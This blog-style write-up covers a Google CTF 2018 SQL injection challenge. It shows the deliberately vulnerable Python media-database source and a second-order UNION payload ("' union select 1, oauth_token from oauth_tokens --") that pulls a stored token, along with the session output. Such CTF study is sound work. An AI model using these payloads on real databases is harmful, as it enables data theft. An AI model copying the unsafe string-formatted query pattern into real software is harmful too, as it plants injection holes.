CTF - SQL injection
In Google's 2018 CTF, there was an interesting challenge on SQL injection. I liked this one because it works as a great educational tool. It' not a simple "DROP TABLE" case one can use for completely unprotected SQL input. Instead there are some protections in place that one could find in the real world - and the exploit is not so complicated that it does not serve as a good example.
In this challenge, there is a media database where the user can create playlists and such, but there is also an oauth token in the database which we are supposed to get. Lets look at the code:
#!/usr/bin/env python2.7
import sqlite3
import random
import sys
BANNER = "=== Media DB ==="
MENU = """\
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit"""
with open('oauth_token') as fd:
flag = fd.read()
conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute("CREATE TABLE oauth_tokens (oauth_token text)")
c.execute("CREATE TABLE media (artist text, song text)")
c.execute("INSERT INTO oauth_tokens VALUES ('{}')".format(flag))
def my_print(s):
sys.stdout.write(s + '\n')
sys.stdout.flush()
def print_playlist(query):
my_print("")
my_print("== new playlist ==")
for i, res in enumerate(c.execute(query).fetchall()):
my_print('{}: "{}" by "{}"'.format(i+1, res[1], res[0]))
my_print("")
my_print(BANNER)
while True:
my_print(MENU)
sys.stdout.write("> ")
sys.stdout.flush()
choice = raw_input()
if choice not in ['1', '2', '3', '4', '5']:
my_print('invalid input')
continue
if choice == '1':
my_print("artist name?")
artist = raw_input().replace('"', "")
my_print("song name?")
song = raw_input().replace('"', "")
c.execute("""INSERT INTO media VALUES ("{}", "{}")""".format(artist, song))
elif choice == '2':
my_print("artist name?")
artist = raw_input().replace("'", "")
print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))
elif choice == '3':
my_print("song name?")
song = raw_input().replace("'", "")
print_playlist("SELECT artist, song FROM media WHERE song = '{}'".format(song))
elif choice == '4':
artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
my_print("choosing songs from random artist: {}".format(artist))
print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))
else:
my_print("bye")
exit(0)
Ok, so this is a pretty simple setup there are two tables, oauth_tokens
and media. The code is meant to only ever allow the user to access the table media
.
Ok, lets log into the program and see how it behaves:
$ nc media-db.ctfcompetition.com 1337
=== Media DB ===
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 1
artist name?
me
song name?
too
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 2
artist name?
me
== new playlist ==
1: "too" by "me"
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 3
song name?
too
== new playlist ==
1: "too" by "me"
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 4
choosing songs from random artist: me
== new playlist ==
1: "too" by "me"
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 5
bye
$
cool. seems to work as intended. The next step is to try to insert SQL statements into the artist and song names, of course. Lets look at the parse statement for the add song
option:
my_print("artist name?")
artist = raw_input().replace('"', "")
my_print("song name?")
song = raw_input().replace('"', "")
c.execute("""INSERT INTO media VALUES ("{}", "{}")""".format(artist, song))
So the database seems to follow good practice at this point making sure to delete "
characters so that we cannot just inject more SQL statements. However, feeling safe due to the fact that there is no user entry in the data, there is no such sanitization in the retrieval routine:
artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
my_print("choosing songs from random artist: {}".format(artist))
print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))
We can exploit that. Let's say we enter this as the artist:
' --
The entry routine will happily take this verbatim and put it in the database as the name.
=== Media DB ===
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 1
artist name?
' --
song name?
thesong
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 4
the -- is a comment and so everything behind it is dropped. This statement:
print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))
creates this query:
SELECT artist, song FROM media WHERE artist = '' --'
Which results in no match, of course. But now we can extend the SQL statement to do almost anything we want. Naively, we would want to do something of the sort of
SELECT artist, song FROM media WHERE artist = '' union select * from oauth_tokens --'
But that naturally does not work because the union does not know how to combine the left and right hand side when the columns have different names. The solution is to tell the union explicitly like so:
SELECT artist, song FROM media WHERE artist = '' union select 1, oauth_token from oauth_tokens --'
=== Media DB ===
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 1
artist name?
' union select 1, oauth_token from oauth_tokens --
song name?
songname
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 4
== new playlist ==
1: "theflag" by "1"
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
>
Which was my approach. I should mention a smarter approach as given here: https://hackso.me/google-ctf-beginners-quest-part-2/
which I like better because it does not rely on access to the source code at all. Namely, the author uses union
together with sqlite_master
to get all the necessary information about the database structure and then obtains the exploitable SQL statements by deliberately putting invalid queries in.
The lesson is to always sanitize the SQL statements, even when just pulling information from a database.